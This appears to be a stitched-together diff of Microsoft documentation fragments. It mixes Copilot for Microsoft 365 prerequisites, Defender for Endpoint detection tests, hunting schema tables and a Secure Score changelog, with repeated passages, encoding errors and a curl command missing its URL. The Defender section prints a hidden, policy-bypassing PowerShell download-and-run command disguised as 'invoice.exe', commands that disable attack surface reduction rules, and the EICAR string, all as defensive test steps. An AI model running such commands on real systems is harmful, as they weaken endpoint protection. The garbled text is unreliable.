+Copilot for Microsoft 365 uses a combination of LLMs, a type of artificial intelligence (AI) algorithm that uses deep learning techniques and vast data sets to understand, summarize, predict, and generate content. These LLMs include pre-trained models, such as Generative Pre-Trained Transformers (GPT) like GPT-4, designed to excel in these tasks.

+- **Microsoft 365 Apps** (such as Word, Excel, PowerPoint, Outlook, Teams, and Loop) operate with Copilot for Microsoft 365 to support users in the context of their work. For example, Copilot in Word is designed to assist users specifically in the process of creating, understanding, and editing documents. In a similar way, Copilot in the other apps helps users in the context of their work within those apps.

+- **Microsoft Copilot with Graph-grounded chat** enables you to bring your work content and context to Microsoft Copilot's chat capabilities. With Graph-grounded chat, you can draft content, catch up on what you missed, and get answers to questions via open-ended prompts— all securely grounded in your work data. Use Graph-grounded Copilot at many surfaces, including within Microsoft Teams, at [Microsoft365.com](https://www.microsoft365.com/), and at [copilot.microsoft.com](https://copilot.microsoft.com/).

+- **Semantic Index** for Copilot uses multiple LLMs that sit on top of Microsoft Graph to interpret user queries and produce sophisticated, meaningful, and multilingual responses that help you to be more productive. It allows you to search quickly through billions of vectors (mathematical representations of features or attributes) to help connect you with relevant and actionable information in your organization. For more information, see the [Semantic Index for Copilot article](https://aka.ms/SemanticIndex/Whitepaper)

+The semantic index brings a whole new world of understanding to your data in Microsoft 365. Through enhanced interactions with your individual and company data via the Microsoft Graph, and the creation of a new index, the semantic index is an improvement to Microsoft 365 search that lays the foundation for the next generation of Search and Copilot experiences. The semantic index respects security and policies in the Microsoft Graph so that when a user issues a query either directly via search or in Microsoft Copilot, it's always in the security context of the user, and only content that a user has access to is returned.

+Copilot with commercial data protection provides enhanced security for users accessing the generative AI capabilities of Copilot. This experience is on by default for users when they are signed in and using a Microsoft 365 E3, E5, A3, A5, Business Standard, or Business Premium license assigned by your organization.

+> - When you allow Microsoft Copilot with Graph-grounded chat to reference public web content. The query sent to Bing might include your organizationΓÇÖs data. For more information, see [Microsoft Copilot for Microsoft 365 and public web content](#microsoft-copilot-for-microsoft-365-and-public-web-content).

+When a user interacts with Microsoft Copilot for Microsoft 365 apps (such as Word, PowerPoint, Excel, OneNote, Loop, or Whiteboard), we store data about these interactions. The stored data includes the user's prompt, how Copilot responded, and information used to ground Copilot's response. For example, this stored data provides users with Copilot interaction history in [Microsoft Copilot with Graph-grounded chat](https://support.microsoft.com/topic/5b00a52d-7296-48ee-b938-b95b7209f737) and [meetings in Microsoft Teams](https://support.microsoft.com/office/0bf9dd3c-96f7-44e2-8bb8-790bedf066b1). This data is processed and stored in alignment with contractual commitments with your organizationΓÇÖs other content in Microsoft 365. The data is encrypted while it's stored and isn't used to train foundation LLMs, including those used by Microsoft Copilot for Microsoft 365.

+Copilot for Microsoft 365 is upholding data residency commitments as outlined in the Microsoft Product Terms and Data Protection Addendum. Copilot will be added as a covered workload in the data residency commitments in Microsoft Product Terms later in 2024.

+Microsoft [Advanced Data Residency (ADR)](/microsoft-365/enterprise/advanced-data-residency) and [Multi-Geo Capabilities](/microsoft-365/enterprise/microsoft-365-multi-geo) offerings will include data residency commitments for Copilot for Microsoft 365 customers later in 2024. For EU customers, Copilot for Microsoft 365 is an EU Data Boundary service. Customers outside the EU may have their queries processed in the US, EU, or other regions.

+Microsoft Copilot with Graph-grounded chat can reference public web content from the Bing search index to ground user prompts and responses. Based on the userΓÇÖs prompt, Copilot for Microsoft 365 determines whether it needs to use Bing to query public web content to help provide a relevant response to the user. There are [controls available to manage the use of public web content](#controls-available-to-manage-the-use-of-public-web-content) for both admins and users.

+The integration of Microsoft Copilot for Microsoft 365 and Microsoft 365 Apps enables Copilot experiences to take place inside individual apps, such as Word, PowerPoint, Teams, Excel, Outlook, and more. As a result of this integration, the requirements for using Microsoft Copilot for Microsoft 365 are nearly identical to the requirements for using Microsoft 365 Apps.

+The following are the prerequisites for using Microsoft Copilot for Microsoft 365. Copilot for Microsoft 365 requires the user to have a prerequisite base license assigned. You can find the list of eligible base licenses in the [Microsoft Copilot for Microsoft 365 service description guide](/office365/servicedescriptions/office-365-platform-service-description/microsoft-365-copilot).

+### Microsoft 365 Apps

+[Microsoft 365 Apps](/deployoffice/about-microsoft-365-apps) must be deployed. Use the [Microsoft 365 Apps setup guide](https://admin.microsoft.com/Adminportal/Home?Q=learndocs#/modernonboarding/microsoft365copilotsetupguide) in the Microsoft 365 admin center to deploy to your users.

+> - Review your privacy settings for Microsoft 365 Apps because those settings might have an effect on the availability of Microsoft Copilot for Microsoft 365 features. For more information, see [Microsoft Copilot for Microsoft 365 and policy settings for connected experiences](microsoft-365-copilot-privacy.md#microsoft-copilot-for-microsoft-365-and-policy-settings-for-connected-experiences).

+To enable Copilot in Teams to reference meeting content after the meeting has ended, transcription or meeting recording must be enabled. To learn more about configuring transcription and recording, see [Configure transcription and captions for Teams meetings](/microsoftteams/meeting-transcription-captions) and [Teams meeting recording](/microsoftteams/meeting-recording).

+## Update channels

+Microsoft Copilot for Microsoft 365 will follow Microsoft 365 Apps' standard practice for deployment and updates, being available in all update channels, except for Semi-annual channel. Preview channels include Insiders, Current Channel - Preview and Beta Channel. Production channels include Current Channel and then Monthly Enterprise Channel.

+Copilot is available in Current Channel, and starting December 12, on Monthly Enterprise Channel. As always, preview channels are a great option to validate the product before rolling out to the rest of organization. To learn more, see To learn more, see [Overview of update channels](/deployoffice/updates/overview-update-channels), and the [Microsoft 365 Insider channels](/deployoffice/insider/compare-channels).

+## Network requirements

+Copilot services connect to endpoints contained within the [Microsoft 365 endpoint taxonomy](https://aka.ms/o365ip). As with all Microsoft 365 services, we recommend that customers align their network with the [Microsoft 365 network connectivity principles](/microsoft-365/enterprise/microsoft-365-network-connectivity-principles). This helps provide the best experience with Copilot through minimization of latency and increased network quality of service for critical network flows.

+There are many Copilot experiences, including some core experiences like Excel, Word, PowerPoint, Teams, and Loop, that use WebSocket connections (wss://) from the device running the Microsoft 365 app to a Microsoft service. So, to use these Copilot experiences, WebSocket connections must be allowed from user endpoints to the endpoints listed in our endpoint taxonomy, specifically in ID number 147 in the section for [Microsoft 365 Common and Office Online](/microsoft-365/enterprise/urls-and-ip-address-ranges).

+While Copilot supports Conditional Access Policies in SharePoint Online configured to target "all cloud apps" or "Office 365 group," Microsoft Copilot does not currently support Conditional Access policies configured to the SharePoint Online app directly. We anticipate deploying a change in coming weeks.

+Microsoft Copilot does not currently support Restricted Access Control and Microsoft Purview Information Barriers (Implicit and Owner moderated mode) on sites. Support for both policies is intended.  We anticipate deploying a change in coming weeks.

+[Microsoft Copilot for Microsoft 365](https://www.microsoft.com/microsoft-365/blog/2023/03/16/introducing-microsoft-365-copilot-a-whole-new-way-to-work/) is an AI-powered productivity tool that uses large language models (LLMs) and integrates your data with the Microsoft Graph and Microsoft 365 Apps. It works alongside popular Microsoft 365 Apps such as Word, Excel, PowerPoint, Outlook, Teams, and more. Copilot provides real-time intelligent assistance, enabling users to enhance their creativity, productivity, and skills. This article covers the technical requirements to access and configure Copilot for Microsoft 365.

+- **OneDrive Account** You need to have a OneDrive account for several features within Copilot for Microsoft 365, such as saving and sharing your files. For more information, see [Sign in or create an account for OneDrive](https://support.microsoft.com/office/video-sign-in-or-create-an-account-for-onedrive-3adf09fd-90e3-4420-8c4e-b55e2cde40d2?ui=en-us&rs=en-us&ad=us).

+- **New Outlook for Windows** For seamless integration of Copilot for Microsoft 365 with Outlook, you are required to use the new Outlook for Windows, currently in preview. You can switch to Outlook Mobile to access the new Outlook experience. For more information, see [Getting started with the new Outlook for Windows](https://support.microsoft.com/office/getting-started-with-the-new-outlook-for-windows-656bb8d9-5a60-49b2-a98b-ba7822bc7627).

+- **Microsoft Teams** To use Copilot for Microsoft 365 with Microsoft Teams, you must use the Teams desktop client or web client. You can [download the desktop client here](https://www.microsoft.com/microsoft-teams/download-app) or sign into the web app at [https://teams.microsoft.com](https://teams.microsoft.com/). Both the current and the new version of Teams are supported. For more information, see [Microsoft Teams desktop client](/microsoftteams/get-clients?tabs=Windows).

+ To enable Copilot in Teams to reference meeting content after the meeting has ended, transcription or meeting recording must be enabled. To learn more about configuring transcription and recording, see [Configure transcription and captions for Teams meetings](/microsoftteams/meeting-transcription-captions) and [Teams meeting recording](/microsoftteams/meeting-recording).

+- **Microsoft Whiteboard** To use Copilot for Microsoft 365 with Microsoft Whiteboard, you must have Whiteboard enabled for your tenant. To learn more about Microsoft Whiteboard, see [Manage access to Microsoft Whiteboard for your organization](/microsoft-365/whiteboard/manage-whiteboard-access-organizations).

+> Copilot is available in Current Channel, and starting December 12, on Monthly Enterprise Channel. As always, preview channels are a great option to validate the product before rolling out to the rest of organization. To learn more, see To learn more, see [Overview of update channels](/deployoffice/updates/overview-update-channels), and the [Microsoft 365 Insider channels](/deployoffice/insider/compare-channels).

+The Copilot for Microsoft 365 report, which is in continuous enhancement, includes a Readiness section and Usage section. In the Readiness section, you can view which users are technically eligible for Copilot, assign licenses, and monitor usage of Microsoft 365 apps that Copilot integrates best with. Within the Usage section, you can view a summary of how usersΓÇÖ adoption, retention, and engagement are with Copilot for Microsoft 365, and the activity of every Copilot user in your organization. The report becomes available within 72 hours, and we will update the documentation once there is improved latency.

+**Total Prerequisite Licenses** The number is the sum of all users who have at least one license assigned to them or who could be assigned a license. The following license types are eligible for Copilot:

+- Microsoft 365 E5

+- Microsoft 365 E3

+- Office 365 E3

+- Office 365 E5

+- Microsoft 365 A5 for faculty

+- Microsoft 365 A3 for faculty

+- Office 365 A5 for faculty

+- Office 365 A3 for faculty

+- Microsoft 365 Business Standard

+- Microsoft 365 Business Premium

+The last recommended action card promotes [Microsoft Copilot Dashboard](/viva/insights/org-team-insights/copilot-dashboard), where you can deliver insights to your IT leaders to explore Copilot readiness, adoption, and impact in Viva Insights.

+In Recommendations, the recommended action card highlights [Microsoft Copilot Dashboard](/viva/insights/org-team-insights/copilot-dashboard), where you can deliver insights to your IT leaders to explore Copilot readiness, adoption, and impact in Viva Insights.

+- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)

+- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)

+- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)

+- Windows 11, Windows 10 1709 build 16273 or later

+- Windows Server 2022, Windows Server 2019, Windows Server 2016 and Windows Server 2012 R2 with the unified MDE client.

+### Scenario 3 (Windows 10 version 1803 or later): ASR rule blocks unsigned USB content from executing

+Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Disabled

+Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Disabled

+Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled

+Add-MpPreference -AttackSurfaceReductionRules_Ids a8f5898e-1dc8-49a9-9878-85004b8a61e6 -AttackSurfaceReductionRules_Actions Disabled

+

+- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)

+- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)

+- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)

+- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)

+- Windows 11, Windows 10 Anniversary update (1607) or later

+- Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows Server 2012 R2 with the new unified Defender for Endpoint client.

+-

+- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)

+- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)

+- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)

+- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)

+- Windows 11, Windows 10, Windows 8.1, and Windows 7 SP1

+- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)

+- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)

+- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)

+- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)

+- Windows 11 or Windows 10 1709 build 16273 or newer

+- Windows Server 2022, Windows Server 2019, and Windows Server 2016.

+- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)

+- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)

+- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows)

+- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)

+- Windows 11 or Windows 10

+- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2008 R2 SP1

+- macOS

+- Linux

+- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)

+- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)

+- Windows 11 or Windows

+- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2 and Windows Server 2008 R2 SP1.

+#### Applies to:

+- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)

+- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)

+## Scenario requirements and setup

+- Windows 11, Windows 10 version 1709 build 16273 or newer, Windows 8.1, or Windows 7 SP1.

+- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2008 R2 SP1.

+- Linux

+- macOS

+- Microsoft Defender for Endpoint

+- Microsoft Defender for Endpoint on Linux

+- Microsoft Defender for Endpoint on macOS

+### Windows

+1. Open a Command Prompt window

+2. At the prompt, copy and run the command below. The Command Prompt window will close automatically.

+```powershell

+powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'

+```

+3. If successful, the detection test will be marked as completed and a new alert will appear in few minutes.

+### Linux

+1. Download [script file](https://aka.ms/LinuxDIY) to an onboarded Linux server

+```bash

+curl -o ~/Downloads/MDE Linux DIY.zip https://aka.ms/LinuxDIY

+```

+1. Extract the zip

+```bash

+unzip ~/Downloads/MDE Linux DIY.zip

+```

+1. And run the following command:

+```bash

+./mde_linux_edr_diy.sh

+```

+After a few minutes, a detection should be raised in Microsoft Defender XDR.

+3. Look at the alert details, machine timeline, and perform your typical investigation steps.

+### macOS

+ > > **[Move to Trash]** **[Cancel]**

+Refer to the link for detailed sample json file - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)

+In the above output, it can be seen that stress-ng is the top process generating large number of events and might result into performance issues. Most likely stress-ng is generating the system call with ID 82. You can create a ticket with Microsoft to get this process excluded. In future as part of upcoming enhancements, you will have more control to apply such exclusions at your end.

+Exclusions applied to auditd cannot be migrated or copied to eBPF. Common concerns such as noisy logs, kernel panic, noisy syscalls are already taken care of by eBPF internally. In case you want to add any further exclusions, then reach out to Microsoft to get the necessary exclusions applied.

+- Enterprise U.S. Government customers should allow the following URLs:

+ - `*.events.data.microsoft.com`

+ - `*.endpoint.security.microsoft.us (GCC-H & DoD)`

+ - `*.gccmod.ecs.office.com (GCC-M)`

+ - `*.config.ecs.gov.teams.microsoft.us (GCC-H)`

+ - `*.config.ecs.dod.teams.microsoft.us (DoD)`

+

+**Applies to:**

+- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)

+- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)

+- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)

+- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)

+- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)

+Scenario requirements and setup

+- Windows 11, Windows 10, Windows 8.1, Windows 7 SP1

+- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012, and Windows Server 2008 R2

+- Linux

+- macOS

+- Microsoft Defender Real-time protection is enabled

+## EICAR test file to simulate malware

+After you enable Microsoft Defender for Endpoint or Microsoft Defender for Business or Microsoft Defender Antivirus, you can test the service and run a proof of concept to familiarize yourself with its feature and validate the advanced security capabilities effectively protect your device by generating real security alerts.

+Run an AV detection test to verify that the device is properly onboarded and reporting to the service. Perform the following steps on the newly onboarded device:

+### Windows

+1. Prepare for the EICAR test file:

+ 1. Use an EICAR test file instead of real malware to avoid causing damage. Microsoft Defender Antivirus treats EICAR test files as malware.

+1. Create the EICAR test file:

+ 1. Copy the following string: `X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*`

+ 1. Paste the string into a .TXT file and save it as EICAR.txt

+### Linux/macOS

+1. Open a Terminal window. Copy and execute the following command:

+

+Linux

+```bash

+curl -o ~/tmp/eicar.com.txt https://secure.eicar.org/eicar.com.txt

+```

+macOS

+curl -o ~/Downloads/eicar.com.txt

+```

+|`OSPlatform`|`string`|Platform of the operating system running on the device. Indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10, and Windows 7.|

+|--||--|

+| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |

+| `AdditionalFields` | `string` | Additional information about the entity or event |

+| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |

+| `RemoteDeviceName` | `string` | Name of the device that performed a remote operation on the affected device. Depending on the event being reported, this name could be a fully-qualified domain name (FQDN), a NetBIOS name, or a host name without domain information. |

+| `LogonId` | `long` | Identifier for a logon session. This identifier is unique on the same device only between restarts. |

+| `LocalIP` | `string` | IP address assigned to the local device used during communication |

+| `LocalPort` | `int` | TCP port on the local device used during communication |

+| `InitiatingProcessLogonId` | `long` | Identifier for a logon session of the process that initiated the event. This identifier is unique on the same device only between restarts. |

+| `IsSigned` | `bool` | Indicates whether the file is signed |

+| `IsTrusted` | `bool` | Indicates whether the file is trusted based on the results of the WinVerifyTrust function, which checks for unknown root certificate information, invalid signatures, revoked certificates, and other questionable attributes |

+| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |

+| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |

+| `ClientVersion` | `string` | Version of the endpoint agent or sensor running on the device |

+| `PublicIP` | `string` | Public IP address used by the onboarded device to connect to the Microsoft Defender for Endpoint service. This could be the IP address of the device itself, a NAT device, or a proxy. |

+| `OSArchitecture` | `string` | Architecture of the operating system running on the device |

+| `OSBuild` | `long` | Build version of the operating system running on the device |

+| `IsAzureADJoined` | `boolean` | Boolean indicator of whether device is joined to the Microsoft Entra ID |

+| `LoggedOnUsers` | `string` | List of all users that are logged on the device at the time of the event in JSON array format |

+| `OSVersion` | `string` | Version of the operating system running on the device |

+| `MachineGroup` | `string` | Machine group of the device. This group is used by role-based access control to determine access to the device. |

+| `LogonType` | `string` | Type of logon session, specifically:<br><br> - **Interactive** - User physically interacts with the device using the local keyboard and screen<br><br> - **Remote interactive (RDP) logons** - User interacts with the device remotely using Remote Desktop, Terminal Services, Remote Assistance, or other RDP clients<br><br> - **Network** - Session initiated when the device is accessed using PsExec or when shared resources on the device, such as printers and shared folders, are accessed<br><br> - **Batch** - Session initiated by scheduled tasks<br><br> - **Service** - Session initiated by services as they start<br> |

+| `IsLocalAdmin` | `boolean` | Boolean indicator of whether the user is a local administrator on the device |

+| `LogonId` | `long` | Identifier for a logon session. This identifier is unique on the same device only between restarts. |

+| `RemoteDeviceName` | `string` | Name of the device that performed a remote operation on the affected device. Depending on the event being reported, this name could be a fully-qualified domain name (FQDN), a NetBIOS name or a host name without domain information. |

+| `InitiatingProcessIntegrityLevel` | `string` | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet download. These integrity levels influence permissions to resources. |

+| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |

+| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |

+| `LocalPort` | `int` | TCP port on the local device used during communication |

+| `InitiatingProcessIntegrityLevel` | `string` | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet download. These integrity levels influence permissions to resources. |

+| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |

+| `NetworkAdapterType` | `string` | Network adapter type. For the possible values, refer to [this enumeration](/dotnet/api/system.net.networkinformation.networkinterfacetype). |

+| `NetworkAdapterStatus` | `string` | Operational status of the network adapter. For the possible values, refer to [this enumeration](/dotnet/api/system.net.networkinformation.operationalstatus). |

+| `ConnectedNetworks` | `string` | Networks that the adapter is connected to. Each JSON element in the array contains the network name, category (public, private or domain), a description, and a flag indicating if it's connected publicly to the internet. |

+| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |

+| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |

+| `LogonId` | `long` | Identifier for a logon session. This identifier is unique on the same device only between restarts. |

+| `InitiatingProcessLogonId` | `long` | Identifier for a logon session of the process that initiated the event. This identifier is unique on the same device only between restarts. |

+| `InitiatingProcessIntegrityLevel` | `string` | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet download. These integrity levels influence permissions to resources. |

+| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |

+| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |

+| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |

+| `Categories` | `dynamic` | List of categories that the information belongs to, in JSON array format |

+| `ConfigurationImpact` | `real` | Rated impact of the configuration to the overall configuration score (1-10) |

+| `Context` | `dynamic` | Additional contextual information about the configuration or policy |

+| `ConfigurationImpact` | `real` | Rated impact of the configuration to the overall configuration score (1-10) |

+| `ConfigurationBenchmarks` | `dynamic` | List of industry benchmarks recommending the same or similar configuration |

+| `Tags` | `dynamic` | Labels representing various attributes used to identify or categorize a security configuration |

+| `LastSeenTime` | `string` | Date and time when the device was last seen by this service |

+| `DeviceId` | `string` | Unique identifier for the device in the service |

+| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |

+| `OSPlatform` | `string` | Platform of the operating system running on the device. This indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10 and Windows 7. |

+| `OSVersion` | `string` | Version of the operating system running on the device |

+| `OSArchitecture` | `string` | Architecture of the operating system running on the device |

+| `EndOfSupportDate` | `datetime` | End-of-support (EOS) or end-of-life (EOL) date of the software product |

+| `ProductCodeCpe` | `string` | The standard Common Platform Enumeration (CPE) name of the software product version or 'not available' where there's no CPE |

+| `DeviceId` | `string` | Unique identifier for the device in the service |

+| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |

+| `OSPlatform` | `string` | Platform of the operating system running on the device. Indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10, and Windows 7. |

+| `OSVersion` | `string` | Version of the operating system running on the device |

+| `OSArchitecture` | `string` | Architecture of the operating system running on the device |

+| `CveTags` | `dynamic` | Array of tags relevant to the CVE; example: ZeroDay, NoSecurityUpdate |

+| `CvssScore` | `string` | Severity score assigned to the security vulnerability under the Common Vulnerability Scoring System (CVSS) |

+| `PublishedDate` | `datetime` | Date vulnerability was disclosed to the public |

+| `VulnerabilityDescription` | `string` | Description of the vulnerability and associated risks |

+| `AffectedSoftware` | `dynamic` | List of all software products affected by the vulnerability |

+| `EmailClusterId` | `long` | Identifier for the group of similar emails clustered based on heuristic analysis of their contents |

+| `ReportId` | `string` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |

+| `ReportId` | `string` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |

+| `ReportId` | `string` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns |

+| `DestinationPort` | `int` | Destination port of the activity |

+| `AccountDisplayName` | `string` | Name of the account user displayed in the address book. Typically a combination of a given or first name, a middle initial, and a last name or surname. |

+| `Port` | `int` | TCP port used during communication |

+| `ReportId` | `string` | Unique identifier for the event |

+| `AdditionalFields` | `dynamic` | Additional information about the entity or event |

+| `AccountDisplayName` | `string` | Name of the account user displayed in the address book. Typically a combination of a given or first name, a middle initial, and a last name or surname. |

+| `CreatedDateTime` [*](#mdi-only) | `datetime` | Date and time when the account user was created |

+| `LogonType` | `string` | Type of logon session, specifically:<br><br> - **Interactive** - User physically interacts with the device using the local keyboard and screen<br><br> - **Remote interactive (RDP) logons** - User interacts with the device remotely using Remote Desktop, Terminal Services, Remote Assistance, or other RDP clients<br><br> - **Network** - Session initiated when the device is accessed using PsExec or when shared resources on the device, such as printers and shared folders, are accessed<br><br> - **Batch** - Session initiated by scheduled tasks<br><br> - **Service** - Session initiated by services as they start |

+| `AccountDisplayName` | `string` | Name of the account user displayed in the address book. Typically a combination of a given or first name, a middle initial, and a last name or surname. |

+| `DeviceType` | `string` | Type of device based on purpose and functionality, such as network device, workstation, server, mobile, gaming console, or printer |

+| `OSPlatform` | `string` | Platform of the operating system running on the device. This indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10 and Windows 7. |

+| `Port` | `int` | TCP port used during communication |

+| `DestinationPort` | `int` | Destination port of related network communications |

+| `ReportId` | `string` | Unique identifier for the event |

+| `AdditionalFields` | `dynamic` | Additional information about the entity or event |

+| `AccountDisplayName` | `string` | Name of the account user displayed in the address book. Typically a combination of a given or first name, a middle initial, and a last name or surname. |

+| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |

+| `Port` | `int` | TCP port used during communication |

+| `DestinationPort` | `int` | Destination port of related network communications |

+| `ReportId` | `string` | Unique identifier for the event |

+| `AdditionalFields` | `dynamic` | Additional information about the entity or event |

+| `IPAddress` | `string` | Public IP address of the device from which the user clicked on the link|

+| **What is managed response?** | Microsoft Defender Experts for XDR offers **Managed response** where our experts manage the entire remediation process for incidents that require them. This process includes investigating the incident to identify the root cause, determining the required response actions, and taking those actions on your behalf.|

+| **What actions are in scope for managed response?** | All actions found below are in scope for managed response for any device and user that isn't excluded.<br><br>*For devices* *(Available now)*<ul><li>Isolate machine<br><li>Release machine from isolation<br><li>Run antivirus scan<br><li>Stop and quarantine file<br><li>Release file from quarantine<br><li>Restrict app execution<br><li>Remove app restriction</ul><br>*For users (Coming soon)*<ul><li>Force password reset<br><li>Disable user<br><li>Enable user<br><li>Suspend user<br><li>Soft delete emails </ul><br> |

+| **What support do Defender Experts offer for excluded assets?** | If our experts determine that you need to perform response actions on excluded devices or users, we notify you through various customizable methods and direct you to your Microsoft Defender XDR portal. From your portal, you can then view a detailed summary of our investigation process and the required response actions in the portal, and perform these required actions directly. Similar capabilities are also available through Defender APIs, in case you prefer using a security information and event management (SIEM), IT service management (ITSM), or any other third-party tool. |

+| **How am I going to be informed about the response actions?** | Response actions that our experts have completed on your behalf and any pending ones that you need to perform on your excluded assets are displayed in the **Managed response** panel in your Microsoft Defender XDR portal's **Incidents** page. <br><br>In addition, you'll also receive an email containing a link to the incident and instructions to view the managed response in the portal. Moreover if you have integration with Microsoft Sentinel or APIs, you'll also be notified within those tools by looking for DEX statuses. For more information, see [FAQs related to Microsoft Defender Experts for XDR incident notifications](../defender/faq-incident-notifications-xdr.md).|

+|Microsoft Defender Vulnerability Management|Centralized permissions management for all Defender Vulnerability Management capabilities.|

+|Microsoft Defender for Office 365|Full support for all data and actions scenarios that are controlled by [Email & Collaboration roles](../office-365-security/mdo-portal-permissions.md) and scenarios controlled by [Exchange Online permissions](/exchange/permissions-exo/permissions-exo). </br></br> **Note:** <ul><li>The Microsoft Defender XDR RBAC model is initially available for organizations with Microsoft Defender for Office 365 Plan 2 licenses only. This capability isn't available to users on trial licenses.</li><li>Granular delegated admin privileges (GDAP) isn't supported.</li><li>Cmdlets in Exchange Online PowerShell and Security & Compliance PowerShell continue to use the old RBAC models and aren't affected by Microsoft Defender XDR Unified RBAC.</ul><li>|

+|Microsoft Defender for Cloud|Support access management for all Defender for Cloud data that is available in Microsoft Defender portal.|

+## January 2024

+

+The following recommendations have been added as Microsoft Secure Score improvement actions:

+

+**Microsoft Entra (AAD):**

+- Ensure 'Phishing-resistant MFA strength' is required for Administrators.

+- Ensure custom banned passwords lists are used.

+**Admin Center:**

+- Ensure ΓÇÿUser owned apps and servicesΓÇÖ is restricted.

+**Microsoft Forms:**

